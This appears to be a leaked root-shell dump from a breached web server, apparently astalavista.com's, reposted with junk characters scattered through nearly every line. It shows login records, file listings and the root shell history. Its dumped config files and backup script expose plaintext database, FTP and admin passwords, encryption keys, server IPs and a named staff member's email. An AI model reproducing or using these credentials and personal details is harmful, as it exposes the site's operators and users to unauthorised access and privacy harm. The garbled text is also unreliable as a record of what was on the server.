# #9 |( `+ d- L' w9 h6 r5 K
# Admin Contact - 链接标记support@secureservertech.com #1 v) u* K; f' I% m% M
# #
2 c2 M& ^) @8 C: t# Available ShortCuts #2 C% [! y$ H2 s8 ?9 Q; r
# #7 B. T5 A" ]7 c0 C
# nst - list active connections #
0 Y% O! a- i. `- e4 M# ddos - shows how many times each ip is connected #
4 z1 ~; E# r" P# ltr - restart the webserver #/ Q# ^! |" v4 x6 E: |' [
# phpc - edit the php config file #
. |: n. R) X0 H9 l/ L5 D# htc - edit the webserver configuration file #
/ b. m% r" n2 S J8 q6 X' ]: B; h# up - uptime #1 x+ ]4 r8 A, P. J3 m
# etd - edit the motd of the day file #
8 m2 X/ {$ @4 q. s' R. N9 \# htr - start and restart apache if needed #
/ ~5 s. z- H3 a0 }" Q/ M# syng - shows active SYN_RECV connections #
& s2 F5 K* V% j- W# synd - syn flood blocker - “synd -h” for usage #
1 s: Z% }# c+ Q% @#####################################################
" f' M( |: m$ K6 m2 [: ^# NOTES: #
* u. ?) S* l$ N# Last Upgrade - 12-08-2008 by JF #+ \" i2 u4 Z+ s) b, X3 }
# My.cnf/Mysql Optimization - 1-28-09 #$ T& z- b& p; v4 e/ x! _. b( `7 L0 W
# #9 e9 o: p3 f2 I( t4 @
# #
, g. O9 ~* Z8 z3 J& q; |# #
6 H9 Q9 p; W& q0 |1 b4 k' y#####################################################
3 ]3 \- Z/ i5 ~% o
: N+ V) p9 G% q7 | Rsh-3.2# lastlog | grep -v Never
* ]. q- a6 V9 b; i$ ^Username Port From Latest
) Z$ F! E) i9 aroot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
4 u- O9 `& i6 H/ Wadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
' `+ ?9 H' x' n3 p& Wcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20095 N+ Z1 E# l. i" P4 D
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20096 M" d" u; o) B
* Z7 }, I9 R' ysh-3.2# ls -la
: [5 K5 X8 A! ltotal 453376% |( o9 e$ w1 M/ u
drwxr-x— 15 root root 4096 Jun 4 08:40 .2 x& \; V2 M" N5 U) _
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ... u, w/ _ x2 g8 y
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
8 ]$ ]- C `* h# A-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg
9 T% h+ l2 [5 j9 R+ i4 Q-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
7 _8 O, T; G4 ]% G/ o* @! ?: p- @-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
3 }( x% q; l; \# d) l. w-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
& a2 f' m+ V1 P. }4 F l-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
8 u% X* x8 T+ M) j-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
. I0 K4 E# X' H-rw-r–r– 1 root root 1327 Nov 29 2007 cert1 ^) y6 `1 i6 a$ {. Q6 S. V
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
" k# J2 J) ]" v/ t8 ? u: Ydrwxr-xr-x 4 root root 4096 May 20 2008 .cpan& ~" |% a9 x7 A# w+ ~5 {
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
5 w0 K! _1 a0 n, m% O-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
# {3 h9 q6 K# jdrwx—— 2 root root 4096 Oct 28 2007 .elinks
4 `8 J( b2 X& |( k% J" v( k' }drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
, P4 |5 Q) ~5 F# x1 P6 Y-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2
& C* r" u H9 U" S. R5 Y4 t; p-rw——- 1 root root 0 Apr 16 13:19 .history
) v: g) F. v$ c/ V# M! J-rw-r–r– 1 root root 16095 Sep 11 2007 install.log7 v- [1 q+ H& l+ E; t. _
-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog, U* g' @( Q. @
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh8 d6 u1 {2 W! K- t1 u' Q
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
" u. |9 g2 W' z a* L+ ~drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp U" }- _+ O0 a4 ?9 o
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec
8 [1 H: }7 x& _ k' y- ?8 m-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
0 h% k5 z' i4 x0 Z-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2/ v+ [5 ^" t7 A
-rwx—— 1 root root 760 Sep 18 2008 lp
0 S( }* X. v7 q; y+ p' Xdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
% K" v: D! l- z, H# L2 o-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz% E! d! N9 Y6 q) S- e
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.18 s! T3 A( K6 L4 V
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
; Q# o$ @ k- j) w7 b L-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz( o( ~- {/ @ W3 H
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
! @' Q' k1 z* n+ g/ D: b8 d7 K1 ~-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz i, r6 A) e" N. d
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh
% \1 Z9 K( x7 P# G# d& M8 U-rw——- 1 root root 41 Oct 19 2007 .my.cnf% B' {/ H4 ^& [# |. ]
-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history s; e' }5 P. L; v* Y# P1 x
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport/ D+ l" R: \/ U4 H% l
-rw——- 1 root root 41 May 20 2008 .mytop, J9 S6 t5 i. \9 r: Y
drwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.61 F0 e% Y0 t: O
-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
9 R) S4 l4 Q b8 Ldrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp8 T8 j6 c) N9 l! P/ Z! k* h
-rw——- 1 root root 1462 Sep 21 2007 opt.php: h7 f) K, S0 B
-rw-r–r– 1 root root 3371 Sep 22 2007 p
* w; d( ? H0 C: j6 V9 ^/ R$ F-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz28 P9 M* G2 c, G; @& Z, E; T# L
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
" G% L5 I$ \5 J! g/ M, F8 z-rw-r–r– 1 root root 716 Nov 28 2007 server.csr- c) d; Z1 G* q6 o
-rw-r–r– 1 root root 887 Nov 28 2007 server.key
2 U7 l- ?; c) ddrwx—— 2 root root 4096 Oct 10 2008 .ssh Y5 O r. ?5 F% Y
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
" ]5 X: I# X4 F% w5 u8 u+ E2 | b-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
+ D: I5 n2 d# B/ Y-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
% E0 W2 d( [' w-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
) i, F$ x% V; |2 @' \$ a5 F$ Q# a% F2 M4 \9 rdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp( D+ q5 C* ^/ q# e9 u
-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
5 z* }0 w* P$ u9 X) a" Ddrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0. E- h/ r( F0 N/ n. A# D
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2+ v8 |6 z3 l7 L0 R, ~5 @& p4 x" d
-rw——- 1 root root 12997 May 16 2008 .viminfo/ g9 ^- U( s) R5 g
+ g$ l9 `- z# c: Tsh-3.2# cat .bash_history
I8 V4 G+ r2 f2 {$ }[snip]$ i* k O/ w1 ]% O9 B
wget cp4sst.com/sstlinux.tar.gz/ |, U1 W! J) o% ?
tar zxvf sstlinux.tar.gz
8 n# D8 w, L0 w* U& @+ H! tcd linux-2.6.27.10; D. I. l: Q' Z( R
sh install.sh
4 b/ j7 K j. d+ x5 Jmake bzImage ; make modules ; make modules_install ; make install
; \" T$ x8 `4 Y, `: Y' Bmake clean
& r+ o* t1 P' P0 y# sservice mysqld restart1 w% u) U& Q' i
[snip]! F2 a4 I- Z# P' D* \8 x
cd /usr/sbin/ A& e0 p( S- b9 C* J) e2 Z/ I) T
chmod 4777 traceroute" A. q6 k( T' f/ M/ Z; v% x+ [
chmod 4777 ping" S3 C$ V* i( B/ M7 f8 m' |
traceroute -I 链接标记[url]www.astalavista.ch[/url]8 x3 Z4 `) u, r. t" U
[snip]
{! p7 U8 V7 h! S+ s8 }4 X' c% mvi /etc/csf/csf.conf: X% @* ]2 x4 D |
traceroute google.ch
# ~; g) ^5 g# M% p$ u+ C- O" mservice csf restart U; m7 L8 o" ?0 _1 N* {7 I
tracert google.ch. b& Q% J* I2 w: M' R9 a6 [
service csf restart
* b0 D7 T. V( e O$ M3 H | Dtraceroute 链接标记[url]www.google.ch[/url]
6 ], ^( k3 M! H! htracert 链接标记[url]www.google.ch[/url]
7 F! T1 b: T( L. l( \$ v$ \. L! vtraceroute 链接标记[url]www.google.ch[/url]" a, A# l. O( |) O
locate traceroute
+ C* `9 d6 M' s; ]% z" o" h8 Nchown 4755 /bin/traceroute
9 x8 i5 _4 T1 x. a/ T, g& u" ichown 4777 /bin/traceroute
0 W3 s+ @+ @) ~: l& p7 _ llocate ping
6 z: L5 T7 {% a0 v, |: B: Gchown 4755 /bin/ping% p5 r+ Q8 d- q( n8 T7 L3 D
chown 4777 /bin/ping5 s+ X! x; U- @& u- ?- s
cd /bin/
# Y$ G0 [0 r; b: ~ls -ali | grep ping
' H8 S' b. `' Y0 x5 D, d# W: M& J8 vchown root ping
' L% r$ }1 g, mchmod 4755 ping
5 O+ n; m3 S, [+ c2 ^, T" xls -ali | grep traceroute3 u8 n4 {+ |( E: A- [" `# k# J
chown root traceroute
4 T0 K/ h) p4 f! Achmod 4755 traceroute
7 _3 C {* t! Kls -ali | grep traceroute3 j: m6 D8 J+ s7 X1 d
traceroute -I 链接标记[url]www.google.ch[/url]7 {: [0 `& k; ^3 p# [/ d4 b
traceroute 链接标记[url]www.google.ch[/url]
# l: U! n$ O" r* J- ?' Mwhois pmsantos.ch
. [& c5 u, B, r[snip]. J1 g8 [5 o! |; [8 X) `9 v7 u5 [
mysql -h com_contrexx2_live < /root/defaultp_ports.sql, g$ F k- f+ e6 J9 P
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql
, z+ V9 R. D: ~' {" b! Zmysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql; Q# l; a4 X* E2 U+ v
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
4 h& Y# p/ \% S1 Utop
v& W: F* M! x: s y( w3 _% bping ssth.ch6 d1 l5 \4 U b* ?8 S* o2 N1 d
ping asdlkfaljgasd???ljg???lasj.ch
; ]7 K3 k- ]1 lping asdlkfaljgasdlasj.ch! w: ?3 j P' [' O5 [: n
ping 链接标记[url]www.ssth.ch[/url]1 f% e' R' ]5 U. F2 a% ~% [
ping ssth.ch
! Z$ _6 V% q. S: ]" s1 }nslookup 链接标记[url]www.google.ch[/url]
4 t+ X: I* V4 g! m( p1 S" ?nslookup 链接标记[url]www.ssth.ch[/url]" |! k o: C' o$ b- \! _
man nslookup
8 M$ u) E! @$ k! C/ l2 m0 u* `# yping 链接标记[url]www.google.ch[/url]
5 O- c( h8 k* Mnslookup 链接标记[url]www.google.ch[/url] X# I( ~- g7 m, ?! y& e$ X
nslookup 链接标记[url]www.google.ch[/url]# ^9 {7 R7 z8 y7 ]
nslookup salfjasdlf.ch
' \( a+ L& J# y, n4 O[snip]
1 Z- ?/ |: w7 a2 S, J! c% }# Bopenssl passwd -1 sadf
( B# V" b3 @' w( Copenssl passwd -1 5cZNHstdTy, ]: s- [% C" P
mysql* |4 y# d. `. |. b! i+ t4 @
mysql/ L4 U! g( c7 [* W2 t2 ^9 Q8 s
locate proftp, j( O/ D$ d, f( E' X4 w' Z0 d
vi /etc/proftpd.passwd. g/ b( M% O' G- O
service proftpd restart: M: { b$ W5 g% g5 x4 e8 f2 k# I/ A
locate proftpd.conf) C l+ U8 ]& x9 H) p; P3 j- T
vi /etc/proftpd.conf4 m x; Q# Z! B0 k* } j l' j
vi /etc/proftpd.passwd6 ~, X, }# B5 W% B, X* U+ _
service proftpd restart4 S; m; O6 T5 U
[snip]3 X) m7 N5 e& |0 F8 t! l( S
/bin/sh /home/com/backup_system/backup.sh
) n5 S+ W5 u6 K+ ], v2 q/ Itar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin* j( b7 |* F+ _7 P9 A
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
* g8 M* t+ q6 x" X. xmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql7 s7 m. u- ^$ S8 T
ls -ali
4 a2 y2 w1 ^* l( I! y( b5 Fmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
$ n. ^) x7 a) _" G7 jmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
6 D9 x, L$ Z0 S% u w# \0 G9 h* {crontab -l
% a( K# i4 }% X3 Lcrontab -l
- g* @5 N% R, Rphp -q /home/com/public_html/modifications/cronjobs/securitynews.php9 ?- {, ]2 v! x% X) y# m
/home/com/public_html/modifications/cronjobs/exploits.sh
: \2 Q; m$ K7 rwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]: z2 L+ O8 A/ ]% z" {
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz+ e/ |$ Z9 D' b* r1 @: ~
cd lsws-4.0.33 O! h: j3 X) ~6 U6 {8 F8 u0 t
sh install.sh- A& B y# @( R* L* O7 Q/ h- \1 c
uptime
7 u2 {" `$ E. u6 \hdparm -tt /dev/sda
; d& T% [0 ?4 l% S2 `! F: ]iostat
" I4 G6 ~) N$ K% z5 q! T1 nyum install iostat
, Z4 I8 }! I$ {& b) e( ciostat0 i) J- X1 R: S L" Q8 m9 \8 i
whereis iostat/ T4 T G, Q7 C! \# j' H
yjm clean all. L9 U. L* d9 U* l) F* f
yum clean all ; yum -y update" g* k/ Z7 H7 h- |. p
iostat# ]( S! A7 k3 T
yum install systat
, X9 J! x1 A4 W9 x( H1 Yrpm -qa | grep iostat
7 k D5 ~: J2 e. K7 }/ J0 drpm -qa | grep sysstat
! n% V' r7 l9 qrpm -qa | grep systat
5 ?/ u* }& K$ _1 m/ i8 h6 O4 \6 ydmesg -c
?4 k$ f# ~8 D4 v! ^* C9 hsysctl -p3 v/ O/ Z8 s7 n1 O3 I4 u7 Q6 L
uname -r
# O8 z+ o- H$ vcd /usr/src. V L! }/ [! S" Y& K; V* x
wget nix101.com/kernels/sstlinux.tar.gz. i1 o( @ Y Y
shutdown -r now2 `8 A7 h8 S0 ~5 K/ _1 H9 o8 [0 m
nano -w /boot/grub/grub.conf5 b: Y; o7 R+ q. C8 V# ?# S
- h0 P6 q% e1 K' @7 `: O
sh-3.2# cat .my.cnf- B( G9 ~ \& Y" b! t% c+ `* h* q
[client]
* J/ |6 e, L, uuser=da_admin9 s" D$ R- \8 B# E( ~
password=X9dctmRH
# q6 E! ]! N0 L, D8 M! p' m9 r# U0 t: v% |0 a
sh-3.2# cat /home/com/backup_system/backup.sh
" t2 }0 I: ?, _4 A! F I2 v+ P" H#!/bin/sh
) T# q. T$ J& U* e#####################################################################
9 ]2 J7 V$ S2 I- q5 r7 P# #( q1 `0 F% c0 m5 X7 I* {
# incremental backup for astalavista.com #' n! P+ m; Y! P
# #1 u5 ]2 Q7 `, u& @5 l7 H
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #6 C9 Y1 W; m `: b/ o+ r
# #& F( N4 O- @9 y" h" ^
#####################################################################
, i" i+ t) u: _5 w3 r[snip]9 I7 B- C b$ V( _& I
PROG_DIR=”/home/com/backup_system”;; e$ i& O" j8 J/ t M2 S, u. m( a
BACKUP_DIR=”/home/com/backups”;# d- K0 ]$ A) ]2 o: E( e) R/ u
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;
; _! J# f L. A1 Q$ N" d9 \6 G# ftp for synology backup server+ ? Q9 d0 a1 @8 @
FTP_HOST=”212.254.194.163″;% k. {) K- @: a8 G# i- b7 }; ^6 Z
FTP_PORT=”21″;
- o5 W+ {' m" r1 p* d% c4 [3 jFTP_USER=”astalavista.com”;7 K; P/ \( j7 I0 `! P/ u& r
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;
1 w8 p- n) E3 C4 p \- JFTP_DIR=”/astalavista.com”;
3 }2 Y1 b3 ^# |# database
) M" h# F" `7 W7 A6 s1 FDB_HOST=”localhost”;, U' Y" o6 a9 d# z1 M: c
DB_USER=”contrexxuser2″;( u; x) Z- N. @' L, v
DB_PASS=”0fEYNZgXz1pKe”;
* X" u& X1 u8 J( p7 R9 v% PDB_DATABASE1=”com_contrexx2_live”;
2 g+ ~, j Y! p. `7 ~9 I8 A1 GDB_DATABASE2=”com_contrexx2″;/ f& f4 ~! c0 m3 X" a
[snip]7 E/ a$ A( Y; N
ftp -in $FTP_HOST $FTP_PORT <<EOF
( G; ]% `% d9 j% y7 z$ ?quote USER $FTP_USER
" q0 N7 q" m- z# @- Gquote PASS $FTP_PASS
6 G/ ~% S1 b# E% G# _cd $FTP_DIR
4 l, _# [& R. z3 V9 ^' `" k1 yput $DB_FULLNAME-SQL_Dump.tar
! E: T, s& s0 s8 s+ _put $BACKUP_FULLNAME-Public_HTML.tar4 V6 p3 i: Q1 b& H6 V
close
" M- ~. G$ M, K! \bye# @5 G+ b$ _. Z o: O' j
EOF
+ N1 G5 X7 v! M( B; P- z
5 h) D) Z1 o% ?# ]! G! ash-3.2# cd /home
8 B- r: b5 a& R) y# p2 j0 Fsh-3.2# ls -la
& H6 w9 l" x( Wtotal 120! R3 a( t+ O: @
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .6 K& T( |" U e) |5 Q
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..8 B2 X$ U8 e: R' t3 F5 q6 \! p
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin! G3 J9 D, S- ~
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group
3 O; ?- O* U z. O$ E% G D-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
- t- |8 z7 d) n' f6 O/ ndrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet2 c) K( ]9 j4 P* a; c! c0 f' M. y
drwxr-xr-x 2 root root 4096 Jul 29 2008 backup( c% {" R0 F6 O. `
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.141619 Q& ~& x6 E. h h" h4 Q
drwx–x–x 10 com com 4096 Apr 28 12:40 com7 ? p6 G; S! X/ w9 F( \/ C5 k
drwxr-xr-x 2 root root 4096 May 17 2007 ftp+ |/ r$ A9 o4 t; \
drwx—— 3 jon jon 4096 Sep 21 2007 jon/ {" D- W, j1 e
drwx—— 2 root root 16384 Sep 11 2007 lost+found
8 C+ J! s! _4 I* jdrwxr-xr-x 2 root root 4096 Sep 14 2007 my9 [( X; `2 q& a i% ^: E
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
) `5 }+ o& s$ g* I3 B; X1 \& i3 Bdrwx—— 2 jon jon 4096 Sep 15 2007 test, f: B1 ?1 U3 |
drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp6 @5 |' j9 ]4 d7 l& N
) V0 U; G% Q0 P) t" @
sh-3.2# cd admin
9 `6 Q5 T7 J W h; [sh-3.2# ls -la8 p/ |! K$ z$ @
total 17358962 i9 I/ _2 ^! L5 w1 V- }( Z
drwx–x–x 9 admin admin 4096 Nov 28 2007 .9 z% b# n$ B) r( [6 ^) h7 p+ Q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..& d9 w1 T2 G+ @: o' Z& D8 O
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
b" A' ?( g' S- U' Kdrwx—— 2 admin admin 4096 Sep 28 2007 backups
@" @3 P A8 D6 R" ^-rw——- 1 admin admin 860 Sep 17 2008 .bash_history+ X \" \" O9 ^5 r" g( H
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
8 c, D6 e: a4 O% E3 a-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile8 J; b8 u2 Y. m7 n9 @
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc
) F& G0 j$ c/ @, F3 odrwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
3 A& s4 |% D% f$ X* i* L4 \: I7 Hdrwx–x–x 6 admin admin 4096 Sep 21 2007 domains
- n" V- X" X7 L2 C bdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap
9 e2 N4 k- |! E6 k) b-rw-r–r– 1 root root 24 Sep 21 2007 info.php6 n) u, \* W- S" `8 G6 M, E4 ^% \& `
drwx—— 2 admin admin 4096 Sep 21 2007 mail
% P2 i. k5 D% h4 ?) Q, E-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
% x4 k( y n, F+ B/ {" x5 T$ G5 Q-rw-r–r– 1 root root 887 Nov 28 2007 server.key6 W# C ?1 u9 d9 |% l4 o3 k
-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow0 c: `+ U/ m# f: x7 C
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz* w! y& A4 T. F9 t! T
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups; W, @( f" @# R k
* d/ } h T6 G& W+ ?/ D2 ?
sh-3.2# ..
1 F" e+ W( E8 [! B3 ^+ O5 gsh-3.2# cd jon
- [' M l+ V& X( Ssh-3.2# ls -la
+ H$ }+ ]8 T, stotal 36
; w8 d* t) U& ?2 \7 R! G* V" ldrwx—— 3 jon jon 4096 Sep 21 2007 .5 f% g: b. p: n; W3 c4 a/ |
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..6 M! I5 E2 L D! T7 H- q# s
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history0 Z* i" [1 z- {% G1 Q7 T7 h
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
" U- Y- S7 C, Y$ g T$ L7 T-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile5 G* V& _1 @& K' }( ~6 Q7 K
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
* V2 B! F( Z# x- g/ G+ d* i-rw-r–r– 1 root root 24 Sep 21 2007 info.php7 y2 F1 m% J3 x; B w% `2 n9 _
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
3 c7 P } z" t$ c: x1 d& l2 v. ~7 e7 {6 X) a. p* D
sh-3.2# cd ..5 j6 T+ @1 ~' H& h5 O3 t. s, E
sh-3.2# cd test! F: K' a# k+ }* Y
sh-3.2# ls -la2 R6 R" s3 J* F8 D$ `$ v9 ~9 V
total 48
& W6 x2 F- Y0 h) d$ qdrwx—— 2 jon jon 4096 Sep 15 2007 .+ c/ r% o T$ i. P+ O. V
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 e8 t5 z9 ^- _2 N$ I- Q7 A3 ] x
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
! F0 a& V; a& j, ]- W. l. ?# a-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
1 i; j @; f( f) s-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile1 q6 W! O" J6 K6 I2 g
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc4 U6 L; F' Q6 k3 w/ G0 q& [
sh-3.2# cat .bash_history2 r( q: H( H% q7 y* F5 N2 b' j! ^
/usr/bin/mysqladmin -u root password PoliuJhytg67
+ j/ E3 c" M: A a% f8 A" }- F0 M$ d8 n$ N
sh-3.2# cd ..
8 Z* K$ \9 p; ?3 o/ I" N, u/ E. Hsh-3.2# cd astanet R2 {1 |/ K' P, v4 T4 ~. D
sh-3.2# ls -la
; |3 ~5 ~- ~" ]/ f L3 F* ktotal 52
7 ~& K, A7 Z' x# ?drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .2 n# l0 R, |- Y) m1 x3 e
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..% S: e1 [3 L+ N; r* N" Y* s6 |
drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth0 K& O( b$ S+ ?
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history$ o+ M, l7 j1 t" {6 G+ D, p
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout: Z& r/ J+ M/ G" Q$ v% P
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile: H; K# j$ A4 W3 w% r6 m
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
4 i- h( [' ]: H5 r9 J- Edrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains9 R0 ~8 v4 c! @
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap1 |) y2 W- R+ L( z6 k% d- T
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
* T1 y$ M9 t. _, `2 m5 E0 A! I-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
+ O3 k2 ~) S, G: O' r! Ilrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
+ y0 J6 b, ^# Q/ V-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow
# }3 p7 _" G, |: t3 F/ l
0 c/ @. J% {' O- F& @. _: hsh-3.2# cd auth/- U `. z U3 k/ H+ Z- n$ l
sh-3.2# ls -la
: P: U- c1 q6 U4 xtotal 28
, Z% S( t1 ]2 s3 t4 L5 U) Kdrwxr-xr-x 2 root root 4096 Dec 23 16:00 .
+ l3 z) K7 L! g7 X- A/ Wdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..
K! c4 h2 A3 F-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
# Y1 Z+ m2 |) t! \. W-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php( \; h. L+ S. X" W) B# K
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd0 U6 z1 } L% z( X4 V7 J( m
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting0 S" E+ ]: u4 J
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd' x0 Z7 A: M% b, j
0 N9 Z4 H: O2 K( o/ r1 \5 s7 S
sh-3.2# cat hackercontest.config.inc.php4 I A9 n6 Q7 }" Y6 m1 w# {
<?PHP# z$ Y+ d6 z0 J) ~9 H5 D7 C/ N
// Variabeln f?r Verbindung zur Datenbank //
t, i8 n1 X+ h7 P2 z; V/ S {$conxHost = ‘localhost’; // MySQL hostname/ N$ D% B# m' ^; y1 m
$conxUser = ‘hackercontest’; // MySQL user
, ]+ l& k6 D3 C0 f9 G6 J& k$conxPassword = ‘K6m@7dUc’; // MySQL password& r4 l9 F! P% T# G) _* s( w8 A. E, L- S
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
, |, O# _0 {( {8 Y/ a W?>3 P0 U& q5 E: B) M& s
sh-3.2# cat hosting.config.inc.php% s' a S4 t, h; q$ N' E+ B, `
<?PHP" g1 n& E3 {4 w4 z& {% ~. F, Q
// Variabeln f?r Verbindung zur Datenbank /// K& Q# ]7 j' N- N
$conxHost = ‘localhost’; // MySQL hostname
7 b% S, r/ L2 M0 y% s! k$conxUser = ‘hostinguser’; // MySQL user( M7 R5 @& {$ S- B: T0 X
$conxPassword = ‘cXvB3981′; // MySQL password6 ^* F# B! |8 C) _; w6 l
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish* J) s; R; v5 r6 C' D) W
?>
, e' H7 D* H2 q( o
3 E4 M6 y2 i5 esh-3.2# cd ..# z- H) v& i: s& Y
sh-3.2# cd com
: H5 z! f" N, G% S5 b4 Q) @+ Dsh-3.2# ls -la
. b4 G$ \! C4 Y" _% A' y% O7 n# z/ A, }total 1412081 L( q! e+ ^5 {0 _1 V3 e
drwx–x–x 10 com com 4096 Apr 28 12:40 .% O+ t9 ?$ c% T0 u& Y
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..& X, f1 U r6 o! H6 C; s
drwx—— 2 com com 4096 Jun 4 04:04 backups! b Z, w4 H: t6 I6 m |1 S
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql* _" ]' W0 \% ^" n
drwxr-xr-x 2 com com 4096 May 12 15:20 backup_system* T8 J' }" d7 n7 \! K+ [$ [
